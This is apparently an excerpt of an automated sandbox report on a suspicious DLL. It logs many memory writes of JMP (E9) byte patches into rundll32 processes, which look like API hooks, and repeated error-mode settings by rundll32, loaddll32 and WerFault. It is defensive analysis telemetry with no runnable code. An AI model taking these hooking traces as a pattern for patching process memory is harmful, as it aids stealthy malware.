    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1912 base: BE0005 value: E9 EB EB D6 75 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1912 base: 7694EBF0 value: E9 1A 14 29 8A Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1912 base: BF0005 value: E9 8B 8A D3 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1912 base: 75928A90 value: E9 7A 75 2C 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1912 base: C00005 value: E9 2B 02 D5 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1912 base: 75950230 value: E9 DA FD 2A 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1804 base: 3020005 value: E9 8B 2F 36 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1804 base: 77382F90 value: E9 7A D0 C9 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1804 base: 3170005 value: E9 2B BA 1D 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1804 base: 7734BA30 value: E9 DA 45 E2 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1804 base: 8150008 value: E9 8B 8E 24 6F Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1804 base: 77398E90 value: E9 80 71 DB 90 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1804 base: 8180005 value: E9 8B 4D 7B 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1804 base: 76934D90 value: E9 7A B2 84 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1804 base: 8190005 value: E9 EB EB 7B 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1804 base: 7694EBF0 value: E9 1A 14 84 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1804 base: 81A0005 value: E9 8B 8A 78 6D Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1804 base: 75928A90 value: E9 7A 75 87 92 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1804 base: 81B0005 value: E9 2B 02 7A 6D Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1804 base: 75950230 value: E9 DA FD 85 92 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 81A0005 value: E9 8B 2F 1E 6F Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 77382F90 value: E9 7A D0 E1 90 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 81B0005 value: E9 2B BA 19 6F Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 7734BA30 value: E9 DA 45 E6 90 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 81C0008 value: E9 8B 8E 1D 6F Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 77398E90 value: E9 80 71 E2 90 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 82F0005 value: E9 8B 4D 64 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 76934D90 value: E9 7A B2 9B 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 8300005 value: E9 EB EB 64 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 7694EBF0 value: E9 1A 14 9B 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 8310005 value: E9 8B 8A 61 6D Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 75928A90 value: E9 7A 75 9E 92 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 8320005 value: E9 2B 02 63 6D Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5004 base: 75950230 value: E9 DA FD 9C 92 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: BC0005 value: E9 8B 2F 7C 76 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: 77382F90 value: E9 7A D0 83 89 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: BD0005 value: E9 2B BA 77 76 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: 7734BA30 value: E9 DA 45 88 89 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: BE0008 value: E9 8B 8E 7B 76 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: 77398E90 value: E9 80 71 84 89 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: C00005 value: E9 8B 4D D3 75 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: 76934D90 value: E9 7A B2 2C 8A Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: C10005 value: E9 EB EB D3 75 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: 7694EBF0 value: E9 1A 14 2C 8A Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: C20005 value: E9 8B 8A D0 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: 75928A90 value: E9 7A 75 2F 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: C30005 value: E9 2B 02 D2 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: 75950230 value: E9 DA FD 2D 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 82A0005 value: E9 8B 2F 0E 6F Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 77382F90 value: E9 7A D0 F1 90 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 83B0005 value: E9 2B BA F9 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 7734BA30 value: E9 DA 45 06 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 83C0008 value: E9 8B 8E FD 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 77398E90 value: E9 80 71 02 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 83E0005 value: E9 8B 4D 55 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 76934D90 value: E9 7A B2 AA 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 83F0005 value: E9 EB EB 55 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 7694EBF0 value: E9 1A 14 AA 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 8400005 value: E9 8B 8A 52 6D Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 75928A90 value: E9 7A 75 AD 92 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 8410005 value: E9 2B 02 54 6D Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5192 base: 75950230 value: E9 DA FD AB 92 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 2DF0005 value: E9 8B 2F 59 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 77382F90 value: E9 7A D0 A6 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 7FE0005 value: E9 2B BA 36 6F Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 7734BA30 value: E9 DA 45 C9 90 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 7FF0008 value: E9 8B 8E 3A 6F Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 77398E90 value: E9 80 71 C5 90 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 8010005 value: E9 8B 4D 92 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 76934D90 value: E9 7A B2 6D 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 8020005 value: E9 EB EB 92 6E Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 7694EBF0 value: E9 1A 14 6D 91 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 8140005 value: E9 8B 8A 7E 6D Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 75928A90 value: E9 7A 75 81 92 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 8150005 value: E9 2B 02 80 6D Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2168 base: 75950230 value: E9 DA FD 7F 92 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 2DD0005 value: E9 8B 2F 5B 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 77382F90 value: E9 7A D0 A4 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 2DE0005 value: E9 2B BA 56 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 7734BA30 value: E9 DA 45 A9 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 3040008 value: E9 8B 8E 35 74 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 77398E90 value: E9 80 71 CA 8B Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 3060005 value: E9 8B 4D 8D 73 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 76934D90 value: E9 7A B2 72 8C Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 3070005 value: E9 EB EB 8D 73 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 7694EBF0 value: E9 1A 14 72 8C Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 3080005 value: E9 8B 8A 8A 72 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 75928A90 value: E9 7A 75 75 8D Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 3090005 value: E9 2B 02 8C 72 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7064 base: 75950230 value: E9 DA FD 73 8D Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
